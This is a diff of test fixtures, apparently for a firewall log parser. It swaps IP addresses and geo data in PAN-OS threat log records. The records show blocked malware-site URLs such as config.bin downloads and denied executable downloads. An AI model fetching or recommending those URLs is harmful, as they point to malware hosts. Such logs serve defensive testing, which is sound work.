@@ -5299,19 +5045,19 @@ "server.port": 54431, "server.user.name": "crusher", "service.type": "panw", - "source.address": "173.236.179.57", - "source.as.number": 26347, - "source.as.organization.name": "New Dream Network, LLC", - "source.geo.city_name": "Brea", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 33.9339, - "source.geo.location.lon": -117.8854, + "source.address": "89.160.20.112", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, "source.geo.name": "United States", - "source.geo.region_iso_code": "US-CA", - "source.geo.region_name": "California", - "source.ip": "173.236.179.57", + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "source.port": 80, "tags": [ "forwarded", 
@@ -5323,19 +5069,15 @@ "client.ip": "192.168.0.2", "client.port": 58603, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -5346,7 +5088,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "event.original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -5357,9 +5099,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 22250, + "log.offset": 22169, "network.application": "web-browsing", - "network.community_id": "1:Inta5pHrKZ+nIMo9QJjgmv1raGE=", + "network.community_id": "1:QBN/QiBktrWtqynSIiAfIzaYi1Q=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -5394,13 +5136,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -5420,7 +5162,7 @@ }, { "@timestamp": "2012-04-10T04:51:29.000-02:00", - "client.ip": "91.209.163.202", + "client.ip": "81.2.69.193", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", @@ -5436,7 +5178,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 4, "event.timezone": "-02:00", @@ -5449,9 +5191,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "low", - "log.offset": 22658, + "log.offset": 22575, "network.application": "web-browsing", - "network.community_id": "1:dHpseryW+AZk/t5IUvlyhaLSGI0=", + "network.community_id": "1:cbjnKGuPCSblIcmohKZKae9UtoE=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -5483,7 +5225,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "91.209.163.202" + "81.2.69.193" ], "related.user": [ "crusher" 
@@ -5493,19 +5235,17 @@ "server.port": 61220, "server.user.name": "crusher", "service.type": "panw", - "source.address": "91.209.163.202", - "source.as.number": 9009, - "source.as.organization.name": "M247 Ltd", - "source.geo.city_name": "Montreal", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "CA", - "source.geo.country_name": "Canada", - "source.geo.location.lat": 45.4995, - "source.geo.location.lon": -73.5848, + "source.address": "81.2.69.193", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "European Union", - "source.geo.region_iso_code": "CA-QC", - "source.geo.region_name": "Quebec", - "source.ip": "91.209.163.202", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": 80, "tags": [ "forwarded", @@ -5514,7 +5254,7 @@ }, { "@timestamp": "2012-04-10T04:54:33.000-02:00", - "client.ip": "122.226.169.183", + "client.ip": "81.2.69.145", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -5530,7 +5270,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,122.226.169.183,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,81.2.69.145,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,\"52hxw.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 4, "event.timezone": "-02:00", @@ -5543,9 +5283,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "low", - "log.offset": 23063, + "log.offset": 22977, "network.application": "web-browsing", - "network.community_id": "1:lIp7rPLlF21gCwZ63WafZ2HbNKA=", + "network.community_id": "1:eTLAtG51ZPV2/dv+SiB436Dz5qc=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -5576,8 +5316,8 @@ "panw.panos.virtual_sys": "vsys1", "related.ip": [ "0.0.0.0", - "122.226.169.183", - "192.168.0.2" + "192.168.0.2", + "81.2.69.145" ], "related.user": [ "crusher" 
@@ -5587,18 +5327,17 @@ "server.port": 61726, "server.user.name": "crusher", "service.type": "panw", - "source.address": "122.226.169.183", - "source.as.number": 4134, - "source.as.organization.name": "No.31,Jin-rong Street", - "source.geo.continent_name": "Asia", - "source.geo.country_iso_code": "CN", - "source.geo.country_name": "China", - "source.geo.location.lat": 30.294, - "source.geo.location.lon": 120.1619, + "source.address": "81.2.69.145", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "China", - "source.geo.region_iso_code": "CN-ZJ", - "source.geo.region_name": "Zhejiang", - "source.ip": "122.226.169.183", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.145", "source.port": 80, "tags": [ "forwarded", 
@@ -5610,19 +5349,15 @@ "client.ip": "192.168.0.2", "client.port": 63007, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -5633,7 +5368,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "event.original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,\"softsellfast.com/test/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -5644,9 +5379,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 23445, + "log.offset": 23355, "network.application": "web-browsing", - "network.community_id": "1:n39Q6RPkLwPiDU/pfHT7uRZGkXY=", + "network.community_id": "1:Vnp8O+V9Crkk7bOq4MUbJbz2E70=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -5681,13 +5416,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -5707,7 +5442,7 @@ }, { "@timestamp": "2012-04-10T04:45:17.000-02:00", - "client.ip": "109.201.131.15", + "client.ip": "67.43.156.12", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", @@ -5723,7 +5458,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,109.201.131.15,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,67.43.156.12,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,\"setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 4, "event.timezone": "-02:00", @@ -5736,9 +5471,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "low", - "log.offset": 23856, + "log.offset": 23764, "network.application": "web-browsing", - "network.community_id": "1:69YGwS9/vtp36Khj80nU/Q0TTfM=", + "network.community_id": "1:ax9QTTbZfu796fTkm9gci3IIYNU=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -5769,8 +5504,8 @@ "panw.panos.virtual_sys": "vsys1", "related.ip": [ "0.0.0.0", - "109.201.131.15", - "192.168.0.2" + "192.168.0.2", + "67.43.156.12" ], "related.user": [ "crusher" 
@@ -5780,16 +5515,15 @@ "server.port": 60212, "server.user.name": "crusher", "service.type": "panw", - "source.address": "109.201.131.15", - "source.as.number": 43350, - "source.as.organization.name": "NForce Entertainment B.V.", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "NL", - "source.geo.country_name": "Netherlands", - "source.geo.location.lat": 52.3824, - "source.geo.location.lon": 4.8995, + "source.address": "67.43.156.12", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, "source.geo.name": "Netherlands", - "source.ip": "109.201.131.15", + "source.ip": "67.43.156.12", "source.port": 80, "tags": [ "forwarded", @@ -5798,7 +5532,7 @@ }, { "@timestamp": "2012-04-10T04:46:16.000-02:00", - "client.ip": "91.209.163.202", + "client.ip": "81.2.69.193", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -5814,7 +5548,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,91.209.163.202,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,\"Live-Player_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 4, "event.timezone": "-02:00", @@ -5827,9 +5561,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "low", - "log.offset": 24243, + "log.offset": 24149, "network.application": "web-browsing", - "network.community_id": "1:MKMWzixtfYaSoShU7T3wN6MLk5g=", + "network.community_id": "1:oLAStb88YJIIwaJLzaoMDQ4okzg=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -5861,7 +5595,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "91.209.163.202" + "81.2.69.193" ], "related.user": [ "crusher" 
@@ -5871,19 +5605,17 @@ "server.port": 60392, "server.user.name": "crusher", "service.type": "panw", - "source.address": "91.209.163.202", - "source.as.number": 9009, - "source.as.organization.name": "M247 Ltd", - "source.geo.city_name": "Montreal", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "CA", - "source.geo.country_name": "Canada", - "source.geo.location.lat": 45.4995, - "source.geo.location.lon": -73.5848, + "source.address": "81.2.69.193", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, "source.geo.name": "European Union", - "source.geo.region_iso_code": "CA-QC", - "source.geo.region_name": "Quebec", - "source.ip": "91.209.163.202", + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.193", "source.port": 80, "tags": [ "forwarded", @@ -5896,13 +5628,6 @@ "client.port": 59709, "client.user.name": "crusher", "destination.address": "213.180.199.61", - "destination.as.number": 13238, - "destination.as.organization.name": "YANDEX LLC", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "RU", - "destination.geo.country_name": "Russia", - "destination.geo.location.lat": 55.7386, - "destination.geo.location.lon": 37.6068, "destination.geo.name": "Russian Federation", "destination.ip": "213.180.199.61", "destination.port": 80, @@ -5926,7 +5651,7 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 24645, + "log.offset": 24548, "network.application": "web-browsing", "network.community_id": "1:J4hfLZVy8UJEkW68RkW2hMu84Wk=", "network.direction": "inbound", 
@@ -5993,13 +5718,6 @@ "client.port": 59721, "client.user.name": "crusher", "destination.address": "213.180.199.61", - "destination.as.number": 13238, - "destination.as.organization.name": "YANDEX LLC", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "RU", - "destination.geo.country_name": "Russia", - "destination.geo.location.lat": 55.7386, - "destination.geo.location.lon": 37.6068, "destination.geo.name": "Russian Federation", "destination.ip": "213.180.199.61", "destination.port": 80, @@ -6023,7 +5741,7 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 25056, + "log.offset": 24959, "network.application": "web-browsing", "network.community_id": "1:1211QM61Juawz4PBXLQBL9Q2FNA=", "network.direction": "inbound", @@ -6090,13 +5808,6 @@ "client.port": 59752, "client.user.name": "crusher", "destination.address": "213.180.199.61", - "destination.as.number": 13238, - "destination.as.organization.name": "YANDEX LLC", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "RU", - "destination.geo.country_name": "Russia", - "destination.geo.location.lat": 55.7386, - "destination.geo.location.lon": 37.6068, "destination.geo.name": "Russian Federation", "destination.ip": "213.180.199.61", "destination.port": 80, @@ -6120,7 +5831,7 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 25469, + "log.offset": 25372, "network.application": "web-browsing", "network.community_id": "1:MQfJlERz16LAn6Hn1YhCNKLOjjA=", "network.direction": "inbound", @@ -6183,7 +5894,7 @@ }, { "@timestamp": "2012-04-10T04:19:59.000-02:00", - "client.ip": "173.236.179.57", + "client.ip": "89.160.20.112", "client.port": 80, "destination.address": "192.168.0.2", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -6199,7 +5910,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,173.236.179.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,89.160.20.112,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 4, "event.timezone": "-02:00", @@ -6212,9 +5923,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "low", - "log.offset": 25884, + "log.offset": 25787, "network.application": "web-browsing", - "network.community_id": "1:to6WA2KM9vqO74DfMPJ8+v0cKPs=", + "network.community_id": "1:53oYZBFsaxzIKiLZtutnXPu7S8M=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -6245,8 +5956,8 @@ "panw.panos.virtual_sys": "vsys1", "related.ip": [ "0.0.0.0", - "173.236.179.57", - "192.168.0.2" + "192.168.0.2", + "89.160.20.112" ], "related.user": [ "crusher" 
@@ -6256,19 +5967,19 @@ "server.port": 54431, "server.user.name": "crusher", "service.type": "panw", - "source.address": "173.236.179.57", - "source.as.number": 26347, - "source.as.organization.name": "New Dream Network, LLC", - "source.geo.city_name": "Brea", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 33.9339, - "source.geo.location.lon": -117.8854, + "source.address": "89.160.20.112", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, "source.geo.name": "United States", - "source.geo.region_iso_code": "US-CA", - "source.geo.region_name": "California", - "source.ip": "173.236.179.57", + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "source.port": 80, "tags": [ "forwarded", 
@@ -6280,19 +5991,15 @@ "client.ip": "192.168.0.2", "client.port": 63183, "client.user.name": "crusher", - "destination.address": "204.232.231.46", - "destination.as.number": 27357, - "destination.as.organization.name": "Rackspace Hosting", - "destination.geo.city_name": "Fort Lauderdale", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 26.1792, - "destination.geo.location.lon": -80.1749, + "destination.address": "67.43.156.12", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "US-FL", - "destination.geo.region_name": "Florida", - "destination.ip": "204.232.231.46", + "destination.ip": "67.43.156.12", "destination.port": 80, "event.action": "url_filtering", "event.category": [ 
@@ -6303,7 +6010,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", + "event.original": "Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,\"marketingsoluchion.biz/fkn/config.bin\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -6314,9 +6021,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 26276, + "log.offset": 26178, "network.application": "web-browsing", - "network.community_id": "1:uO6RhHsqSUg1LHv5h+n+FE4cqrE=", + "network.community_id": "1://vTtuimNjuEw/yN5TfxgJqPEC4=", "network.direction": "inbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -6351,13 +6058,13 @@ "related.ip": [ "0.0.0.0", "192.168.0.2", - "204.232.231.46" + "67.43.156.12" ], "related.user": [ "crusher" ], "rule.name": "rule1", - "server.ip": "204.232.231.46", + "server.ip": "67.43.156.12", "server.port": 80, "service.type": "panw", "source.address": "192.168.0.2", 
@@ -6381,17 +6088,7 @@ "client.port": 1047, "client.user.name": "jordy", "destination.address": "207.46.140.46", - "destination.as.number": 8075, - "destination.as.organization.name": "Microsoft Corporation", - "destination.geo.city_name": "Central", - "destination.geo.continent_name": "Asia", - "destination.geo.country_iso_code": "HK", - "destination.geo.country_name": "Hong Kong", - "destination.geo.location.lat": 22.2909, - "destination.geo.location.lon": 114.15, "destination.geo.name": "United States", - "destination.geo.region_iso_code": "HK-HCW", - "destination.geo.region_name": "Central and Western District", "destination.ip": "207.46.140.46", "destination.port": 80, "event.action": "data_match", @@ -6416,7 +6113,7 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 26686, + "log.offset": 26586, "network.application": "web-browsing", "network.community_id": "1:KC3xpBK9CdouZqamG9S6Mjl6LIo=", "network.direction": "inbound", @@ -6472,7 +6169,7 @@ }, { "@timestamp": "2012-04-09T08:18:29.000-02:00", - "client.ip": "65.54.161.34", + "client.ip": "81.2.69.143", "client.port": 80, "destination.address": "192.168.0.6", "destination.geo.name": "192.168.0.0-192.168.255.255", 
@@ -6488,7 +6185,7 @@ "event.dataset": "panw.panos", "event.kind": "alert", "event.module": "panw", - "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,65.54.161.34,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", + "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,81.2.69.143,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,\"sck.aspx\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "event.outcome": "success", "event.severity": 5, "event.timezone": "-02:00", @@ -6501,9 +6198,9 @@ "input.type": "log", "labels.captive_portal": true, "log.level": "informational", - "log.offset": 27064, + "log.offset": 26964, "network.application": "web-browsing", - "network.community_id": "1:qtNTXnMjHLAldLWQ5/jdyuCV6Yk=", + "network.community_id": "1:oZUSrEMVr54enE9TsNjtdpJu0L8=", "network.direction": "outbound", "network.transport": "tcp", "observer.egress.interface.name": "ethernet1/1", @@ -6535,7 +6232,7 @@ "related.ip": [ "0.0.0.0", "192.168.0.6", - "65.54.161.34" + "81.2.69.143" ], "related.user": [ "jordy" 
@@ -6545,19 +6242,17 @@
 "server.port": 1039,
 "server.user.name": "jordy",
 "service.type": "panw",
- "source.address": "65.54.161.34",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Redmond",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 47.6722,
- "source.geo.location.lon": -122.1257,
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
 "source.geo.name": "United States",
- "source.geo.region_iso_code": "US-WA",
- "source.geo.region_name": "Washington",
- "source.ip": "65.54.161.34",
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -6566,7 +6261,7 @@
 },
 {
 "@timestamp": "2012-04-09T08:18:32.000-02:00",
- "client.ip": "65.55.5.231",
+ "client.ip": "81.2.69.143",
